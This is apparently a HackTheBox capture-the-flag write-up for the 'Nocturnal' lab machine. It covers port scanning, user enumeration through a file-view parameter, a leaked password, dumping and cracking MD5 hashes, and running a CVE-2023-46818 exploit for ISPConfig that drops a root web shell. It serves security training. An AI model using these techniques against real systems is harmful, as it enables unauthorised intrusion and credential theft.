Nocturnal

Easy HTB Linux box

Reconnaissance

As always, we start off with a basic port enumeration scan on the target with Nmap

nmap --privileged -sCV -p- --open -Pn -n -sS --min-rate 5000 -oN scan 10.10.11.64
# Nmap 7.95 scan initiated Mon Jul 21 17:05:53 2025 as: /usr/lib/nmap/nmap --privileged -sCV -p- --open -Pn -n -sS --min-rate 5000 -oN scan 10.10.11.64
Nmap scan report for 10.10.11.64
Host is up (0.049s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 20:26:88:70:08:51:ee:de:3a:a6:20:41:87:96:25:17 (RSA)
|   256 4f:80:05:33:a6:d4:22:64:e9:ed:14:e3:12:bc:96:f1 (ECDSA)
|_  256 d9:88:1f:68:43:8e:d4:2a:52:fc:f0:66:d4:b9:ee:6b (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://nocturnal.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 21 17:06:13 2025 -- 1 IP address (1 host up) scanned in 20.66 seconds

We can see Port 80 | HTTP and Port 22 | SSH are open, we can also see it's using virtual hosting so we edit our /etc/hosts file to add nocturnal.htb and check whats inside the webpage!

We can see the use of this website: Uploading and viewing files and this leaves us thinking RCE..?

We register with random credentials and log in and we are redirected into a "Upload File" Dashboard

We try to upload a PHP file but the web warns us with this message:

Invalid file type. pdf, doc, docx, xls, xlsx, odt are allowed.

After uploading some files and intercepting the requests with BurpSuite we see a download interface with the link pointing to a username (in this case mine: delorian) 

http://nocturnal.htb/view.php?username=<username>&file=file.pdf

Exploitation

Let's try and brute-force this using BurpSuite Intruder

Success! We found the user Amanda

We try to enumerate the files of the user amanda and find a file: privacy.odt, which we can open installing LibreOffice

Dear Amanda,
Nocturnal has set the following temporary password for you: arHkG7HAI68X8s1J. This password has been set for all our services, so it is essential that you change it on your first login to ensure the security of your account and our infrastructure.
The file has been created and provided by Nocturnal's IT team. If you have any questions or need additional assistance during the password change process, please do not hesitate to contact us.
Remember that maintaining the security of your credentials is paramount to protecting your information and that of the company. We appreciate your prompt attention to this matter.

Yours sincerely,

Nocturnal's IT team

We find a password: arHkG7HAI68X8s1J so we try to login through SSH and the user amanda but the password was incorrect, however we can access an admin panel through login.php

We see that we have access to some interesting files like login.php

<?php
session_start();
$db = new SQLite3('../nocturnal_database/nocturnal_database.db');

if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    $username = $_POST['username'];
    $password = $_POST['password'];

    $stmt = $db->prepare("SELECT * FROM users WHERE username = :username");
    $stmt->bindValue(':username', $username, SQLITE3_TEXT);
    $result = $stmt->execute()->fetchArray();

    if ($result && md5($password) === $result['password']) {
        $_SESSION['user_id'] = $result['id'];
        $_SESSION['username'] = $username;
        header('Location: dashboard.php');
        exit();
    } else {
        $error = 'Invalid username or password.';
    }
}
?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login</title>
    <link rel="stylesheet" href="style.css">
</head>
<body>
    <div class="container">
        <h1>Login</h1>
        <?php if (isset($error)): ?>
            <p class="error"><?php echo $error; ?></p>
        <?php endif; ?>
        <form method="post">
            <input type="text" name="username" placeholder="Username" required>
            <input type="password" name="password" placeholder="Password" required>
            <button type="submit">Login</button>
        </form>
        <a href="register.php">Don't have an account? Register here</a>
    </div>
</body>
</html>

But for now we can't do much with it so we try and intercept the "Enter Password to Protect Backup" form using BurpSuite and after testing with for a bit we successfully dumped some hashes!

INSERT INTO users VALUES(1,'admin','d725aeba143f575736b07e045d8ceebb');
INSERT INTO users VALUES(2,'amanda','df8b20aa0c935023f99ea58358fb63c4');
INSERT INTO users VALUES(4,'tobias','55c82b1ccd55ab219b3b109b07d5061d');
INSERT INTO users VALUES(6,'kavi','f38cde1654b39fea2bd4f72f1ae4cdda');
INSERT INTO users VALUES(7,'e0Al5','101ad4543a96a7fd84908fd0d802e7db');

We put these hashes on crackstation

Hash
Type of the has
Password found!

55c82b1ccd55ab219b3b109b07d5061d

md5

slowmotionapocalypse

f38cde1654b39fea2bd4f72f1ae4cdda

md5

kavi

Success! we extracted passwords for the users Tobias:slowmotionapocalypse and Kavi:kavi!! 

ssh tobias@nocturnal.htb
The authenticity of host 'nocturnal.htb (10.10.11.64)' can't be established.
ED25519 key fingerprint is SHA256:rpVMGW27qcXKI/SxVXhvpF6Qi8BorsH7RNh1jzi8VYc.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'nocturnal.htb' (ED25519) to the list of known hosts.
tobias@nocturnal.htb's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-212-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

tobias@nocturnal:~$

Privilege Escalation

tobias@nocturnal:~$ netstat -tulpn
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:587 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:* -

We see TCP port 8080 is open so we apply forwarding through SSH

ssh -L 8080:127.0.0.1:8080 tobias@nocturnal.htb

We access localhost:8080 on our web browser and provide the credentials admin:slowmotionapocalypse

We see an ISPCONFIG admin panel, which we can exploit using the CVE-2023-46818

python3 exploit.py http://127.0.0.1:8080 admin slowmotionapocalypse
[+] Logging in as 'admin'
[+] Login successful.
[+] Injecting PHP shell...
[+] Shell dropped at 'sh.php'
[+] Web shell ready. Type commands below. Ctrl+C or 'exit' to quit.
ispconfig-shell# whoami
root

And we are root!!

ispconfig-shell# cat /root/root.txt && cat /home/tobias/user.txt
6e821240c84bf32... DO IT YOURSELF!
d1275993ea71847... DO IT YOURSELF!

Hope you liked this WriteUp and see you next time!!

PreviousPlanningNextLame

Last updated